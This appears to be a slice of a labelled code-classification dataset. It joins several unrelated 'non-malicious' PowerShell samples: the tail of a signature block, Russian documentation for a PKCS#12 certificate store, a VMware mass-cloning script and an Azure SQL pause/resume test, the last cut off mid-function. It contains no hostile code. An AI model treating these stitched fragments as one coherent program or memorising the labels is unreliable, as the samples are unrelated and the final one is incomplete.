# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIC6IsUqgLTev0+Ca8eRFhUap
# MJaKdfO62+ySD6AdkR9rMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAe07NGnQOBKmJ4RX01kDcHx8lis9dOoe0nYzdTS9Fi+sd1fvLVHlYWwWd
# 2UOG5YK/2ZeF0LnvnJvS3ozspdszXqxrmnqdDE2TVX/kZ4IPjlNIh6Zo7Wxqc9DL
# /M/6UNqDBHVy5klZNpY2LbX46FpRYrw+0Jc94KQ5mn0z5VGJrfG2NY5Kt4NXB/I5
# eIkycD4Hai139uxzzkngv48HUPBp1OH2JjCeRBQDsT8J2F04ZZEfqLfp20PtMwC9
# k6VWxuZ7BhI94gaK153nlzt5C7Pzvn43SZtRpE0IUVMHtRNsR8w0k4D4dZDfWORu
# iRQTsqugpmVuyGO2xGoNgUjQnVg2c6GCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC
# F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBIdGc3RCX4SBi0bX2D2cG9q3Gyb5lQUwVP/2zv/2+JQgIGZjLAbSGd
# GBMyMDI0MDUwMzIzMzAxOC42OTFaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHqMIIHIDCCBQigAwIBAgITMwAAAfGzRfUn6MAW1gABAAAB8TANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# NTVaFw0yNTAzMDUxODQ1NTVaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODYwMy0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQCxulCZttIf8X97rW9/J+Q4Vg9PiugB1ya1/DRxxLW2
# hwy4QgtU3j5fV75ZKa6XTTQhW5ClkGl6gp1nd5VBsx4Jb+oU4PsMA2foe8gP9bQN
# PVxIHMJu6TYcrrn39Hddet2xkdqUhzzySXaPFqFMk2VifEfj+HR6JheNs2LLzm8F
# DJm+pBddPDLag/R+APIWHyftq9itwM0WP5Z0dfQyI4WlVeUS+votsPbWm+RKsH4F
# QNhzb0t/D4iutcfCK3/LK+xLmS6dmAh7AMKuEUl8i2kdWBDRcc+JWa21SCefx5SP
# hJEFgYhdGPAop3G1l8T33cqrbLtcFJqww4TQiYiCkdysCcnIF0ZqSNAHcfI9SAv3
# gfkyxqQNJJ3sTsg5GPRF95mqgbfQbkFnU17iYbRIPJqwgSLhyB833ZDgmzxbKmJm
# dDabbzS0yGhngHa6+gwVaOUqcHf9w6kwxMo+OqG3QZIcwd5wHECs5rAJZ6PIyFM7
# Ad2hRUFHRTi353I7V4xEgYGuZb6qFx6Pf44i7AjXbptUolDcVzYEdgLQSWiuFajS
# 6Xg3k7Cy8TiM5HPUK9LZInloTxuULSxJmJ7nTjUjOj5xwRmC7x2S/mxql8nvHSCN
# 1OED2/wECOot6MEe9bL3nzoKwO8TNlEStq5scd25GA0gMQO+qNXV/xTDOBTJ8zBc
# GQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFLy2xe59sCE0SjycqE5Erb4YrS1gMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDhSEjSBFSCbJyl3U/QmFMW2eLPBknnlsfI
# D/7gTMvANEnhq08I9HHbbqiwqDEHSvARvKtL7j0znICYBbMrVSmvgDxU8jAGqMyi
# LoM80788So3+T6IZV//UZRJqBl4oM3bCIQgFGo0VTeQ6RzYL+t1zCUXmmpPmM4xc
# ScVFATXj5Tx7By4ShWUC7Vhm7picDiU5igGjuivRhxPvbpflbh/bsiE5tx5cuOJE
# JSG+uWcqByR7TC4cGvuavHSjk1iRXT/QjaOEeJoOnfesbOdvJrJdbm+leYLRI67N
# 3cd8B/suU21tRdgwOnTk2hOuZKs/kLwaX6NsAbUy9pKsDmTyoWnGmyTWBPiTb2rp
# 5ogo8Y8hMU1YQs7rHR5hqilEq88jF+9H8Kccb/1ismJTGnBnRMv68Ud2l5LFhOZ4
# nRtl4lHri+N1L8EBg7aE8EvPe8Ca9gz8sh2F4COTYd1PHce1ugLvvWW1+aOSpd8N
# nwEid4zgD79ZQxisJqyO4lMWMzAgEeFhUm40FshtzXudAsX5LoCil4rLbHfwYtGO
# pw9DVX3jXAV90tG9iRbcqjtt3vhW9T+L3fAZlMeraWfh7eUmPltMU8lEQOMelo/1
# ehkIGO7YZOHxUqeKpmF9QaW8LXTT090AHZ4k6g+tdpZFfCMotyG+E4XqN6ZWtKEB
# QiE3xL27BDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg2MDMtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQD7
# n7Bk4gsM2tbU/i+M3BtRnLj096CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6d/h1TAiGA8yMDI0MDUwMzIyMjEw
# OVoYDzIwMjQwNTA0MjIyMTA5WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDp3+HV
# AgEAMAcCAQACAgbvMAcCAQACAhUbMAoCBQDp4TNVAgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBABHObYynVM9YzGsK5rTmbue0U++sQba0OmJ6/py9bYst+jWJ
# FdduL86qs4stEzKaUlMl/3ezN58gj+HQ8INRFE4RHT3rLKFSTblhfr0PcZGH1gGZ
# 98XHYiNrggrOi97aXYFA5QN3byXG19Qe62g/e7lbJLzju14822dHOpuP/0jQPouW
# YxTCG4DdxaDfdCM0Iqd2fAJqWZE3ctVWNnNGq5EQYyp06i+cTP8ZZGuWsRqJicI5
# xwcO1hhCj45iLBGlWofUwQWnsJWj7eaEO1I4NPf/pQ6ibatamjWwNdxCVan9ogaV
# z+MokCaSMA4XlOgs2QTPCnx+07VpS8ehM5amp4AxggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfGzRfUn6MAW1gABAAAB8TAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCBERLZPaJAOwyJMvZKYtc5kxnt9Ofqm7ocN5/GqZ7IcUDCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EINV3/T5hS7ijwao466RosB7wwEib
# t0a1P5EqIwEj9hF4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHxs0X1J+jAFtYAAQAAAfEwIgQgnSWPHcUogu4eAcYj59EiB1Jo8qt6
# J4rRf7OtyXj87p0wDQYJKoZIhvcNAQELBQAEggIAYgDO10IpS5KRqLCvuLAVp4xv
# ZMLt/0QVLR/eBubZ1WVqnoJ3vltALFLCFxLMRalAYdvMMLPj1xOZmiH02A6jUDGt
# awaHPCJjdInwldPXBMRc+OsIP1FdTg8vzHhpxDNPxiSpvWYG0v3IV2FXexkRoGLP
# bgL1sdM4gDtzI2IcxJRztcZ6AaQc0mp/9//yWAF5EOMXbRVrZE9QD+BLVJPdqklR
# TXGQfsq2xyMloj0tAoEkdFqLeL9jXv03ELCpY49uIywLzYAk8V/aX6DrUH1pJ4vM
# y51j0dbLgJ2h/vtQtXFPCINZrVNlF89ZlO9AowBg1Knzy52INrbi2eZx5AbVuoQB
# xY5N0zYL/1rJoxdY5+tanh92TspYXswW6O7KZDvMtT7Ne7F/GPvYeMWxN6/SUJb4
# AB1cDa1eC/bSmYxZYHmH8hRThTH9wyTsU6suejeIQBBJH56pTuYMHr8V9i5qdb0+
# Q2o3fivK3C0RUC39BLpxWri3trYxUaxBCVmb6PxSYFNG9XkJOjJXbT0fs/pUSEUS
# yIe+oKSSl5zvyvIeSM/6OdtGp3v1OB7OKey0rGuv+WkcElhRgegvWmKDztdoPFJF
# XOC7xzOYSAKVz6SfnMdKrjfLx+feKYg+C6aeFh+VjDXrW99Ipn4vYhiwWt6QgpB+
# l0+MI7MC8PR32s3lz98=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_23_60.ps1
|
sample_23_60.ps1
|
Хранилище сертификатов и ключей шифрования формата PKCS#12.
Форматов файлов: `*.p12`, `*.pfx`.
MIME-тип: `application/x-pkcs12`.
--------------------
**Видимость:** @Глобально
**Примеры:**
```xbsl
метод ВычислитьПодпись(Данные: Байты, ХранилищаPkcs12: Байты)
знч Криптопровайдер = Криптография.ПолучитьBouncyCastle()
знч Хранилище = новый ХранилищеPkcs12(ХранилищаPkcs12, "12345")
знч Ключ = Хранилище.НайтиЗакрытыйКлюч("Тест", "12345")
знч Сертификат = Хранилище.НайтиСертификат("Тест")
знч Вычислитель = новый ВычислительПодписи(Криптопровайдер, Сертификат, Ключ, АлгоритмХеширования.Sha256)
Вычислитель.УстановитьСлужбуШтамповВремени("http://timestamp.sectigo.com")
знч Подпись = Вычислитель.Подписать(Данные)
знч Верификатор = новый ВерификаторПодписи(Криптопровайдер, Подпись)
если не Верификатор.Проверить(Данные)
выбросить новый ИсключениеНедопустимыйАргумент("Подпись не соответствует данным")
;
;
```
**Сравнение:** Сравнение ссылочное
# Pkcs12Store#Pkcs12Store()
Создает новый экземпляр пустого хранилища ключей.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Перегрузка:** ХранилищеPkcs12(Данные: **Байты**|**ПотокЧтения**, Пароль: **Строка** = ""), ХранилищеPkcs12(Файл: **Файл**|**Строка**, Пароль: **Строка** = "")
**Выбрасывает:**
* **ИсключениеКриптографии** - при ошибке создания хранилища.
# Pkcs12Store#Pkcs12Store(Bytes|ReadableStream,String)
Загружает хранилище ключей из данных `Данные` в формате PKCS#12.
`Пароль` - пароль к хранилищу. Для использования разрешены символы ASCII с кодом от 33 до 126.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Перегрузка:** ХранилищеPkcs12(), ХранилищеPkcs12(Файл: **Файл**|**Строка**, Пароль: **Строка** = "")
**Выбрасывает:**
* **ИсключениеКриптографии** - при ошибке загрузки хранилища.
* **ИсключениеНедопустимыйФормат** - если пароль содержит недопустимые символы.
# Pkcs12Store#Pkcs12Store(File|String,String)
Загружает хранилище ключей из файла `Файл` формата PKCS#12 (`*.p12`, `*.pfx`).
`Пароль` - пароль к хранилищу. Для использования разрешены символы ASCII с кодом от 33 до 126.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Перегрузка:** ХранилищеPkcs12(), ХранилищеPkcs12(Данные: **Байты**|**ПотокЧтения**, Пароль: **Строка** = "")
**Выбрасывает:**
* **ИсключениеКриптографии** - при ошибке загрузки хранилища.
* **ИсключениеНедопустимыйФормат** - если пароль содержит недопустимые символы.
# Pkcs12Store#ToBytes(String)
Сохраняет хранилище в массив байт формата PKCS#12.
`Пароль` - пароль, устанавливаемый на сохраненное хранилище. Для использования разрешены символы ASCII с кодом от 33 до 126.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Выбрасывает:**
* **ИсключениеНедопустимыйФормат** - если пароль содержит недопустимые символы.
# Pkcs12Store#WriteToFile(File|String,String)
Сохраняет хранилище в файл `Файл` в формате PKCS#12.
Если файл по указанному пути существует, он будет перезаписан.
`Пароль` - пароль, устанавливаемый на сохраненное хранилище. Для использования разрешены символы ASCII с кодом от 33 до 126.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Выбрасывает:**
* **ИсключениеНедопустимыйАргумент** - при невалидных символах в пути к файлу.
* **ИсключениеНедопустимыйФормат** - если пароль содержит недопустимые символы.
# Pkcs12Store#WriteToStream(WritableStream,String)
Сохраняет хранилище в поток `Поток` в формате PKCS#12.
`Пароль` - пароль, устанавливаемый на сохраненное хранилище. Для использования разрешены символы ASCII с кодом от 33 до 126.
--------------------
**Видимость:** @Глобально
**Определен:** **ХранилищеPkcs12**
**Выбрасывает:**
* **ИсключениеНедопустимыйФормат** - если пароль содержит недопустимые символы.
|
combined_dataset/train/non-malicious/Updated CloneVM from CSV.ps1
|
Updated CloneVM from CSV.ps1
|
Param ($servercsv)
# $servercsv is the input file
<#
.SYNOPSIS
Mass cloning of virtual machines
.DESCRIPTION
Mass cloning of virtual machines from a template using a CSV file as a source.
.NOTES
1- Assumes template only has a C: drive and that only a D: will be added from the CSV file. Additional drives will have to be done manually.
2- Input CSV file format is at the bottom of this file.
3- When testing use this command to mass delete the VMs created with the script.
import-csv inputfile.csv | % { Remove-VM -DeleteFromDisk -VM $_.Name -RunAsync -Confirm:$false }
4- Folder is not set due to the likelihood of duplicate folder names in large environment. There's no good, consistent, and easy way that I could figure out to handle that.
5- Creating the additional disk fails with PowerCLI 4.0 U1. Reference URLs on the next two lines:
http://blog.vmpros.nl/2009/08/21/vmware-number-of-virtual-devices-exceeds-the-maximum-for-a-given-controller/
http://communities.vmware.com/thread/251601
6- Setting the guest network fails with PowerCLI 4.0 U1. I've posted the issue.
http://communities.vmware.com/thread/262855
** UPDATE- Issue with dvSwitches not supported in PowerCli yet. Workaround here- http://www.lucd.info/2010/03/04/dvswitch-scripting-part-8-get-and-set-network-adapters/
Todos-
1- Set the guest network config. with either Copy-VMGuestfile and Invoke-VMScript, or Set-VMGuestNetworkInterface.
2- Clean up unnecessary output during script run.
3- Create script to validate CSV file. Possibly to be run by Project Managers.
4- Create Excel spreadsheet with dropdown lists of cluster locations and other info to assist Project Managers.
.LINK
http://netops.ma.monster.com/virtech/VMware%20Wiki%20Library/Home.aspx
.EXAMPLE
C:\\Temp> C:\\ops\\posh\\VMware\\Clone_Template_fromCSV.ps1 inputfile.csv
#>
<#
# ** Verify server names are unique **
$VMTargets = Import-CSV $servercsv
$VCs = "vcenter101.ma.tmpw.net","vcenter102.ma.tmpw.net","vcenter201.be.tmpw.net"
$VCs | % {
Connect-VIServer $_ | Out-Null
$AllVMs = Get-VM | Sort
$i = 0;
while ($VMTargets[$i]) {
$j = 0
while ($AllVMs[$j]) {
If ($VMTargets[$i].Name -eq $AllVMs[$j].Name) {
Write-Host "Requested VM name" $VMTargets[$i].Name "is in use. `n"
$DupeNames = $true
} # end If
$j++
} # end while
$i++
} # end while
} #end %
If ($dupenames = $false) {
#>
$serverlist = Import-CSV $servercsv
$serverlist | Format-Table -Autosize
# ** Clone new VM
$serverlist | % {
Connect-VIServer $_.VC #| Out-Null
sleep 5
New-VM -Confirm:$False `
-Name ($_.Name).ToLower() `
-Template $_.Template `
-DiskStorageFormat Thin `
-ResourcePool (Get-ResourcePool -location $_.Cluster | Where { $_ -match $_.ResourcePool } | get-random) `
-Description $_.Description `
-VMHost (Get-VMHost -location $_.Cluster | Sort $_.CPuUsageMhz -Descending | Select -First 1) `
-Datastore (C:\\ops\\posh\\vmware\\Get-DatastoreMostFree.ps1 $_.Cluster).Name
Set-VM -Confirm:$false `
-VM $_.Name `
-NumCpu $_.NumCpu `
-MemoryMB ([int]$_.RAMSizeGB * 1024)
New-HardDisk -vm $_.Name -CapacityKB ([int]$_.D_DriveSizeGB * 1024 * 1024) -ThinProvisioned -Confirm:$false
Get-NetworkAdapter -VM $_.Name | Set-NetworkAdapter -NetworkName $_.VLAN -Confirm:$false
Set-CustomField -Entity $_.Name -Name "Clearquest #" -Value $_.CQTicket
Set-CustomField -Entity $_.Name -Name Environment -value $_.Environment
Set-CustomField -Entity $_.Name -Name Owner -value $_.Owner
Get-FloppyDrive -VM $_.Name | Remove-FloppyDrive -Confirm:$false
Get-UsbDevice -VM $_.Name | Remove-UsbDevice -Confirm:$false
} # end %
# } #end If
# Input file format
<#
VC,Cluster,Name,Description,Template,ResourcePool,NumCPU,RAMSizeGB,D_DriveSizeGB,VLAN,CQTicket,Environment,Owner
vcenterxxx.fqdn.com,Bed-QADevIntv35,QA-DBHYPESS201,Hyperion QA DB,w2k8_std_x64_r2_tmpl,Normal,1,3,50,VLAN350,DEV00451152,QA-Hyperion,Hyperion
#>
|
combined_dataset/train/non-malicious/3652.ps1
|
3652.ps1
|
function Test-DatabasePauseResume
{
$location = "Southeast Asia"
$serverVersion = "12.0";
$rg = Create-ResourceGroupForTest
$server = Create-ServerForTest $rg $location
$databaseName = Get-DatabaseName
$collationName = "SQL_Latin1_General_CP1_CI_AS"
$maxSizeBytes = 250GB
$dwdb = New-AzSqlDatabase -ResourceGroupName $rg.ResourceGroupName -ServerName $server.ServerName -DatabaseName $databaseName `
-CollationName $collationName -MaxSizeBytes $maxSizeBytes -Edition DataWarehouse -RequestedServiceObjectiveName DW100
try
{
$dwdb2 = Suspend-AzSqlDatabase -ResourceGroupName $rg.ResourceGroupName -ServerName $server.ServerName -DatabaseName $dwdb.DatabaseName
Assert-AreEqual $dwdb2.DatabaseName $databaseName
Assert-AreEqual $dwdb2.MaxSizeBytes $maxSizeBytes
Assert-AreEqual $dwdb2.Edition DataWarehouse
Assert-AreEqual $dwdb2.CurrentServiceObjectiveName DW100
Assert-AreEqual $dwdb2.CollationName $collationName
Assert-AreEqual $dwdb2.Status "Paused"
$job = Resume-AzSqlDatabase -ResourceGroupName $rg.ResourceGroupName -ServerName $server.ServerName -DatabaseName $dwdb.DatabaseName -AsJob
$job | Wait-Job
$dwdb3 = $job.Output
